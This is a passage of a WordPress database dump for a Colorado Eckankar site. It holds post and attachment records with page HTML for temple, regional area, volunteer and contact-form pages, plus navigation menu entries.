01:26:20','','esc-temple-bgrid-1','','inherit','open','closed','','esc-temple-bgrid-1','','','2019-07-16 19:26:20','2019-07-17 01:26:20','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/esc-temple-bgrid-1.jpg',0,'attachment','image/jpeg',0),(25073,2,'2019-07-16 19:40:15','2019-07-17 01:40:15','','eck-books-bgrid-1','','inherit','open','closed','','eck-books-bgrid-1','','','2019-07-16 19:40:15','2019-07-17 01:40:15','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/eck-books-bgrid-1.png',0,'attachment','image/png',0),(26200,2,'2019-07-16 21:12:42','2019-07-17 03:12:42','','upcoming-seminars-bgrid-2','','inherit','open','closed','','upcoming-seminars-bgrid-2','','','2019-07-16 21:12:42','2019-07-17 03:12:42','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/upcoming-seminars-bgrid-2.png',0,'attachment','image/png',0),(26249,2,'2019-07-16 21:14:36','2019-07-17 03:14:36','','esc-blog-bgrid-3','','inherit','open','closed','','esc-blog-bgrid-3','','','2019-07-16 21:14:36','2019-07-17 03:14:36','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/esc-blog-bgrid-3.png',0,'attachment','image/png',0),(28862,2,'2019-07-17 19:09:38','2019-07-18 01:09:38','','ek-logo-white-med','','inherit','open','closed','','ek-logo-white-med','','','2019-07-17 19:09:38','2019-07-18 01:09:38','',15806,'https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-logo-white-med.png',0,'attachment','image/png',0),(31882,2,'2019-07-19 12:20:17','2019-07-19 18:20:17','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 45px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 36px; padding-bottom: 14px; border-width: 0px; background-color: #f2f3f4;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-6\" style=\"border-width: 0px;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 33px; text-align: left; margin-top: 11px; font-weight: 600; margin-bottom: 0px; border-width: 0px; color: #1d5791; font-family: \'Raleway\';\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Temple of Colorado</h1>\r\n<h4 class=\"\" style=\"font-size: 19px; font-weight: 600; line-height: 14px; border-width: 0px; font-family: \'Open Sans\'; margin-top: 25px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Master your spiritual destiny.</h4>\r\n<p class=\"\" style=\"font-size: 18px; line-height: 23px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Find love, happiness, and balance in life.</p>\r\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; font-family: Open Sans; font-weight: 400; line-height: 19px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Phone:</strong> 303-756-9287</h2>\r\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; line-height: 30px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 10px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>ECK Temple Hours:<br>\r\n</strong><em>Open during in-person events</em></h2>\r\n<p class=\"\" style=\"margin-top: 36px; border-width: 0px;\"><a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-size: 17px; border-width: 0px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Check The Central Colorado Event Calendar</a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"margin-top: 11px;\"><img class=\"bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter wp-image-263190 size-full\" style=\"box-shadow: #bfbfbf 10px 10px 3px -3px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/01/eck-temple-co-nd-2.jpg\" alt=\"\" width=\"555\" height=\"323\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 9px; border-width: 0px; background-color: rgba(253, 235, 221, 0.76); box-shadow: rgba(17, 17, 26, 0.1) 0px 0px 16px; clip-path: inset(-10px -0px -10px -0px); border: solid bisque 2px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-12\">\r\n<p class=\"\" style=\"font-weight: 600; font-size: 19px; padding: 0px 0px 10px; margin-bottom: 0px; color: #1d5791; border-width: 0px; text-align: center;\" data-font-weight=\"600\"><a class=\"\" style=\"font-size: 19px; font-family: Open Sans; font-weight: 400; border-width: 0px;\" href=\"https://eckankar-colorado.org/temple-gallery/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"> Enjoy The ECK Temple of Colorado Photo Gallery&nbsp; </a><i class=\"fa fa-file-image-o fa-2x\" style=\"color: #f28a27; padding-top: 7px;\"></i></p>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-contact-5 boldgrid-section dynamic-gridblock color1-background-color color-1-text-contrast bg-background-color\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 27px; border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 bg-box-flush col-lg-12\">\r\n<p class=\"boldgrid-google-maps\" style=\"margin: 0px auto;\"><br>\r\n<iframe style=\"width: 100%;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d4341.54923330921!2d-105.07802898867396!3d39.69607762990276!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x876b80e32b510869%3A0xf49d311c529e5085!2s7100%20W%20Mississippi%20Ave%2C%20Lakewood%2C%20CO%2080226!5e0!3m2!1sen!2sus!4v1570147961441!5m2!1sen!2sus\" width=\"2000\" height=\"325\" frameborder=\"0\"></iframe></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\"></div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px; border-width: 0px; background-color: #f2f3f4;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\" style=\"border-width: 0px;\">\r\n<h2 class=\"\" style=\"border-width: 0px; text-transform: none; color: #1d5791; text-align: center; font-size: 25px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">For information or to have a Central Colorado representative<br>\r\ncontact you, just fill out the form below.</h2>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"border-width: 0px; margin-top: -15px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<hr class=\"bg-hr-2 bg-hr\" style=\"margin: 12px auto 18px; color: #23507d; padding: 0px; width: 60%;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=13]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Temple of Colorado','','publish','closed','closed','','eck-temple-of-colorado','','','2023-04-05 10:24:43','2023-04-05 16:24:43','',0,'https://eckankar-colorado.org/?page_id=31882',0,'page','',0),(32074,2,'2019-07-19 12:21:00','2019-07-19 18:21:00','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #ffffff; background-color: #cee4ed;\" data-bg-overlaycolor=\"rgba(62, 62, 62, 0.8)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 0px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center\" style=\"padding-left: 0em; padding-right: 0em;\">\r\n<h1 class=\"\" style=\"color: #1d5791; line-height: 1.3em; font-size: 35px; text-transform: capitalize; margin-top: 20px;\">Loveland</h1>\r\n<h4 class=\"\" style=\"color: #3e3e3e; font-size: 23px; font-weight: 400; line-height: 1em;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">Master your spiritual destiny.</h4>\r\n<p class=\"\" style=\"color: #3e3e3e; font-size: 23px; line-height: 1.3em;\">Find love, happiness, and balance in life.</p>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-bottom: -22px; margin-top: -20px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"color2-color bg-hr-2 bg-hr\" style=\"margin: 30px auto;\" width=\"50%\"></div>\r\n</div>\r\n<div></div>\r\n</div>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"background-color: #cee4ed;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 259px; padding-bottom: 66px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2021/05/loveland-location-page-sized-2.jpg\'); background-size: cover; background-position: 50% 41%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/loveland-location-page-sized-2.jpg\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div style=\"border-bottom: 0px solid transparent; background-image: linear-gradient(to left, rgba(248, 249, 251, 0.7), rgba(248, 249, 251, 0.7)), url(\'https://source.unsplash.com/TiKZ7tzM4P8/1920x1080\'); background-size: cover; background-position: 50% 50%;\" class=\"tmpl-services-13 boldgrid-section dynamic-gridblock background-parallax\" data-bg-overlaycolor=\"rgba(248,249,251,0.7)\" data-image-url=\"https://source.unsplash.com/TiKZ7tzM4P8/1920x1080\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 14px; background-color: rgba(235, 244, 255, 0.49);\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<h2 class=\"\" style=\"text-align: center; color: #1d5791; font-size: 29px; text-transform: none;\">For information or to have a Loveland representative<br>\r\ncontact you, just fill out the form below.</h2>\r\n<p class=\"\" style=\"margin-bottom: 15px; text-align: center; margin-top: 0px; padding: 11px 0px 0px;\"><a class=\"btn-color-1 btn btn-capitalize btn-rounded btn-raised btn-regular\" style=\"font-size: 15px;\" href=\"https://eckankar-colorado.org/loveland-public-calendar-mec/\">Loveland Event Calendar</a></p>\r\n<p class=\"\">&nbsp;</p>\r\n<div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"color: #333333;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<p>[ninja_form id=49]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland Area','','publish','closed','closed','','loveland-eck-center','','','2021-05-25 08:16:27','2021-05-25 14:16:27','',0,'https://eckankar-colorado.org/?page_id=32074',0,'page','',0),(32170,2,'2019-07-19 12:21:49','2019-07-19 18:21:49','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #ffffff; background-color: #ced6d8;\" data-bg-overlaycolor=\"rgba(62, 62, 62, 0.8)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 0px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center\" style=\"padding-left: 0em; padding-right: 0em;\">\r\n<h1 class=\"\" style=\"line-height: 1.3em; font-size: 35px; text-transform: capitalize; margin-top: 20px; color: #1d5791;\">Colorado Mountain Areas</h1>\r\n<h4 class=\"\" style=\"color: #3e3e3e; font-size: 23px; font-weight: 400; line-height: 1em;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">Master your spiritual destiny.</h4>\r\n<p class=\"\" style=\"color: #3e3e3e; font-size: 23px; line-height: 1.3em;\">Find love, happiness, and balance in life.</p>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-bottom: -22px; margin-top: -20px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"color2-color bg-hr-2 bg-hr\" style=\"margin: 30px auto;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"background-color: #ced6d8;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 250px; padding-bottom: 51px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2020/01/wslope-splashpix-FULL-SIZE.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/wslope-splashpix-FULL-SIZE.jpg\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div style=\"border-bottom: 0px solid transparent; background-position: 50% 50%; background-size: cover; background-image: linear-gradient(rgba(255, 255, 255, 0.8), rgba(255, 255, 255, 0.8)), url(\'https://eckankar-colorado.org/wp-content/uploads/2020/01/westslope-bkgnd-image.jpg\');\" class=\"color1-background-color bg-background-color tmpl-services-13 boldgrid-section dynamic-gridblock background-parallax\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops0803b2687703426abfd4959f9a5feb48.jpg\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 15px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\" style=\"text-align: center; text-transform: capitalize; font-weight: 400; margin-top: 17px; margin-bottom: -20px; color: #1d5791;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">the mountain area serves the following regions</h2>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px;\">Alamosa | Breckenridge | Craig | Dillon | Durango | Grand Junction | Hayden<br>\r\nMeeker | Oak Creek | Pagosa Springs | Steamboat Springs | Vail</p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<p>&nbsp;</p>\r\n<div class=\"bg-hr color1-color bg-hr-16\" style=\"width: 49%; margin-top: -14px;\"></div>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"margin-bottom: 15px; text-align: center;\"><a class=\"btn-color-1 btn btn-capitalize btn-rounded btn-raised btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-public-calendar-mec/\">Mountain Area Event Calendar</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 25px; padding-bottom: 74px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row bg-editor-hr-wrap\" style=\"padding-top: 0em; margin-top: -51px; margin-bottom: -47px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<h2 class=\"\" style=\"text-align: center; font-size: 27px; text-transform: none; font-weight: 400; color: #1d5791;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">For information or to have a Mountain Area representative contact you,<br>\r\njust fill out the form below.<br>\r\n<br>\r\n</h2>\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=39]</p>\r\n<div>\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mountain Areas','','publish','closed','closed','','mountain-areas','','','2021-05-10 14:02:00','2021-05-10 20:02:00','',0,'https://eckankar-colorado.org/?page_id=32170',0,'page','',0),(33265,2,'2019-07-19 14:10:10','2019-07-19 20:10:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p>[ninja_form id=9]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Chela Ideas','','publish','closed','closed','','chela-ideas','','','2019-12-26 16:27:35','2019-12-26 23:27:35','',79666,'https://eckankar-colorado.org/?page_id=33265',0,'page','',0),(33361,2,'2019-07-19 14:10:48','2019-07-19 20:10:48','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p>[ninja_form id=24]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n<!-- <p>[passster password=\"time\"][ninja_form id=24][/passster]</p> -->','Volunteer For ECK','','publish','closed','closed','','volunteer-for-eck','','','2019-12-26 16:25:51','2019-12-26 23:25:51','',79666,'https://eckankar-colorado.org/?page_id=33361',0,'page','',0),(33457,2,'2019-07-19 14:07:07','2019-07-19 20:07:07','<div class=\"tmpl-text-15 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2019/07/rocks-water.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/rocks-water.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 49px; padding-top: 78px;\">\r\n<div class=\"col-md-8 col-sm-12 col-xs-12\">\r\n<h1 class=\"color1-color\" style=\"font-size: 44px; text-transform: capitalize; margin-left: 0px; text-align: center; font-family: Raleway; font-weight: 600; text-shadow: #606060 0px 2px 2px;\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">&nbsp;</h1>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 bg-background-color\" style=\"background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d; padding: 25px 25px 13px;\">\r\n<h4 class=\"\" style=\"color: #1d5791; font-size: 32px; font-family: Open Sans; font-weight: 400; padding: 0px; margin-top: 10px; text-transform: capitalize; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Statewide<br>\r\nLeadership Contacts</h4>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<div class=\"bg-hr bg-hr-2\" style=\"color: #1d5791;\"></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n<h4 class=\"\" style=\"font-size: 22px; text-transform: none; font-family: Open Sans; font-weight: 600; color: #141414;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Need to Contact someone in state leadership?</h4>\r\n<h4 class=\"\" style=\"font-size: 18px; text-transform: none; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Please select the your area of interest.</h4>\r\n<h4 class=\"\" style=\"text-transform: none; font-family: Open Sans; font-weight: 400; padding: 0px 0px 3px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You will be directed to a contact form specifically for that area.</h4>\r\n<ul class=\"bg-list-share bg-list\" style=\"padding: 10px 0px 9px; margin-top: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li><a class=\"\" style=\"font-size: 16px; font-family: Open Sans; font-weight: 400;\" href=\"https://eckankar-colorado.org/resa-faq/resa-organization-communications/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado RESA Organization Leadership </a></li>\r\n	<li><a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/central-colorado-organization-leadership/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Central Colorado Organization Leadership</a></li>\r\n	<li><a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/colorado-springs-organization-leadership/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Springs Organization Leadership</a></li>\r\n	<li><a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/loveland-organization-leadership/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Loveland Organization Leadership</a></li>\r\n	<li><a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/northwestern-colorado-organization-leadership/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Mountain Areas Organization Leadership&nbsp; </a></li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Statewide Area Contact List','','publish','closed','closed','','statewide-area-contact-list','','','2021-02-04 20:45:16','2021-02-05 03:45:16','',79666,'https://eckankar-colorado.org/?page_id=33457',0,'page','',0),(33553,2,'2019-07-19 14:08:25','2019-07-19 20:08:25','<div class=\"tmpl-blog-10 boldgrid-section dynamic-gridblock\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2021/02/barn-mountains-3.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2021/02/barn-mountains-3.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 78px; padding-bottom: 62px; margin-left: -15px;\">\r\n<div class=\"col-md-8 col-sm-12 col-xs-12 col-lg-8\">\r\n<h1 class=\"color1-color\" style=\"font-size: 44px; margin-left: 0px; text-align: center; font-family: Raleway; font-weight: 600; text-shadow: #606060 0px 2px 2px; text-transform: none;\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">&nbsp;</h1>\r\n<div class=\"row wow headShake\" data-wow-duration=\"1s\" data-wow-delay=\"1s\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-6 col-xs-12 col-lg-4\" style=\"padding: 17px 15px 13px 19px; background-color: rgba(255, 255, 255, 0.89);\">\r\n<div class=\"\">\r\n<h4 class=\"\" style=\"text-transform: capitalize; font-size: 32px; margin-bottom: 15px; font-family: Open Sans; font-weight: 400; color: #1d5791; margin-top: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Colorado Statewide Initiators and ECK Spiritual Aides</h4>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<div class=\"bg-hr bg-hr-2\" style=\"color: #1d5791; width: auto; margin-left: auto; margin-right: auto;\"></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n<h4 class=\"\" style=\"text-transform: none; font-size: 20px; font-family: Open Sans; font-weight: 400; padding: 0px 0px 13px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Please select the your area of interest. You will be directed to a contact form specifically for that area.</h4>\r\n<ul class=\"bg-list-share bg-list\" style=\"font-family: Open Sans; font-weight: 400; font-size: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/alamosa-initiators-and-esas/\" rel=\"noopener noreferrer\"> Alamosa Area Initiators &amp; ESA’s</a></li>\r\n	<li><a href=\"https://eckankar-colorado.org/boulder-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> Boulder Area Initiators &amp; ESA’s</a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/?page_id=71864&amp;preview=true\" rel=\"noopener noreferrer\"> Central Colorado Initiators &amp; ESA’s</a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/colorado-springs-initiators-and-esas/\" rel=\"noopener noreferrer\"> Colorado Springs Initiators &amp; ESA’s</a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/johnstown-initiators-and-esas/\" rel=\"noopener noreferrer\"> Johnstown Initiators &amp; ESA’s</a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/longmont-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> Longmont Area Initiators &amp; ESA’s </a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/loveland-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> Loveland Area Initiators &amp; ESA’s </a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/parker-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> Parker Area Initiators &amp; ESA’s </a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/pueblo-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> Pueblo Area Initiators &amp; ESA’s&nbsp; </a></li>\r\n	<li><a class=\"\" href=\"https://eckankar-colorado.org/southwest-mountain-area-initiators-and-esas/\" rel=\"noopener noreferrer\"> S. West Mountain Area Initiators &amp; ESA’s</a></li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>','Statewide Initiator & ESAs','','publish','closed','closed','','statewide-initiator-esas','','','2022-09-06 14:46:29','2022-09-06 20:46:29','',79666,'https://eckankar-colorado.org/?page_id=33553',0,'page','',0),(38781,2,'2019-07-20 18:35:38','2019-07-21 00:35:38','','spex-intropix-1','','inherit','open','closed','','spex-intropix-1','','','2019-12-26 20:33:10','2019-12-27 03:33:10','',7172,'https://eckankar-colorado.org/wp-content/uploads/2019/07/spex-intropix-1.jpg',0,'attachment','image/jpeg',0),(39045,2,'2019-07-20 18:56:02','0000-00-00 00:00:00','','Spiritual Exercises','','draft','closed','closed','','','','','2019-07-20 18:56:02','2019-07-21 00:56:02','',0,'https://eckankar-colorado.org/?post_type=tabs_responsive&#038;p=39045',0,'tabs_responsive','',0),(42010,2,'2019-07-21 10:02:27','2019-07-21 16:02:27','','Spiritual Exercises','','publish','closed','closed','','spiritual-exercises','','','2019-07-21 10:02:27','2019-07-21 16:02:27','',0,'https://eckankar-colorado.org/?post_type=accordion_tp&#038;p=42010',0,'accordion_tp','',0),(42448,2,'2019-07-21 10:14:02','0000-00-00 00:00:00','','Spiritual Exercises','','draft','closed','closed','','','','','2019-07-21 10:14:02','2019-07-21 16:14:02','',0,'https://eckankar-colorado.org/?post_type=accordions&#038;p=42448',0,'accordions','',0),(43187,2,'2019-07-21 10:49:01','2019-07-21 16:49:01','','Spiritual Exercises','','publish','closed','closed','','spiritual-exercises','','','2019-08-15 12:24:37','2019-08-15 18:24:37','',0,'https://eckankar-colorado.org/?post_type=responsive_accordion&#038;p=43187',0,'responsive_accordion','',0),(45155,2,'2019-07-21 15:47:21','2019-07-21 21:47:21',' ','','','publish','closed','closed','','45155','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45155',11,'nav_menu_item','',0),(45156,2,'2019-07-21 15:47:21','2019-07-21 21:47:21',' ','','','publish','closed','closed','','45156','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45156',10,'nav_menu_item','',0),(45158,2,'2019-07-21 15:47:21','2019-07-21 21:47:21',' ','','','publish','closed','closed','','45158','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45158',9,'nav_menu_item','',0),(45183,2,'2019-07-21 15:51:26','2019-07-21 21:51:26','','ECK Locations','','publish','closed','closed','','colorado-eck-locations','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45183',7,'nav_menu_item','',0),(45207,2,'2019-07-21 15:53:25','2019-07-21 21:53:25',' ','','','publish','closed','closed','','45207','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45207',18,'nav_menu_item','',0),(45699,2,'2019-07-21 16:56:44','2019-07-21 22:56:44','','ECK Videos','','publish','closed','closed','','eck-videos','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45699',14,'nav_menu_item','',0),(45700,2,'2019-07-21 16:56:44','2019-07-21 22:56:44','','ECK Teachings','','publish','closed','closed','','eck-teachings','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=45700',15,'nav_menu_item','',0),(45701,2,'2019-07-21 16:56:44','2019-07-21 22:56:44','','ECK Membership','','publish','closed','closed','','eck-membership','','','2019-12-26 14:51:11','2019-12-26 